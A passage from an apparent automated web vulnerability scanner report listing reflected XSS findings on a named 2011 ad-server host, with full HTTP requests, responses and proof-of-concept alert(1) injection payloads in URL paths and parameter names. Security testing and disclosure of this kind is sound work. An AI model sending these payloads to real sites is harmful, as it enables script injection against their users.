The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1dfb"><script>alert(1)</script>d811a4a1280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?b1dfb"><script>alert(1)</script>d811a4a1280=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:06 GMT
X-DirectServer: DS6
Content-Type: text/html
Content-Length: 322
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?b1dfb"><script>alert(1)</script>d811a4a1280=1" target="_new">
...[SNIP]...

1.50. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0d4e"><script>alert(1)</script>62fcb4681d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverc0d4e"><script>alert(1)</script>62fcb4681d6/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:12 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 359
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f64538cd0d3800000000c0d4e"><script>alert(1)</script>62fcb4681d6/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.51. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfc0"><script>alert(1)</script>2bd1dcbe073 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random7bfc0"><script>alert(1)</script>2bd1dcbe073=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f31e38cd0d3800000000/acc_random7bfc0"><script>alert(1)</script>2bd1dcbe073=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.52. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cec"><script>alert(1)</script>e5f60b4722f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?68cec"><script>alert(1)</script>e5f60b4722f=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:06 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 367
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40438cd0d3800000000/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?68cec"><script>alert(1)</script>e5f60b4722f=1" target="_new">
...[SNIP]...

1.53. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 342f2"-alert(1)-"eb87461d58a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver342f2"-alert(1)-"eb87461d58a/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:50 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2054
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000342f2"-alert(1)-"eb87461d58a/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "h
...[SNIP]...

1.54. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b34ee"-alert(1)-"491d3a72638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_randomb34ee"-alert(1)-"491d3a72638=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:54 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 2042
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_randomb34ee"-alert(1)-"491d3a72638=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media
...[SNIP]...

1.55. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd63"-alert(1)-"cd13d271e02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?3bd63"-alert(1)-"cd13d271e02=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:44 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2060
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
lia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?3bd63"-alert(1)-"cd13d271e02=1&relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=84996739971
...[SNIP]...

1.56. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 712bb"-alert(1)-"696f09d19b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver712bb"-alert(1)-"696f09d19b0/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 2051
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000712bb"-alert(1)-"696f09d19b0/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "ht
...[SNIP]...

1.57. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc670"-alert(1)-"bd04e5a903d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_randomfc670"-alert(1)-"bd04e5a903d=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:18 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 2040
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_randomfc670"-alert(1)-"bd04e5a903d=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.
...[SNIP]...

1.58. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75deb"-alert(1)-"ceb8cc61332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?75deb"-alert(1)-"ceb8cc61332=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:08 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 2057
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={    
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
alia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?75deb"-alert(1)-"ceb8cc61332=1&relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=86235691049
...[SNIP]...

1.59. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5876"><script>alert(1)</script>87f35693f1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservere5876"><script>alert(1)</script>87f35693f1d/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:43 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 365
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003ea3f38cd0d3800000000e5876"><script>alert(1)</script>87f35693f1d/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.60. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f259"><script>alert(1)</script>4e431d63655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random8f259"><script>alert(1)</script>4e431d63655=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
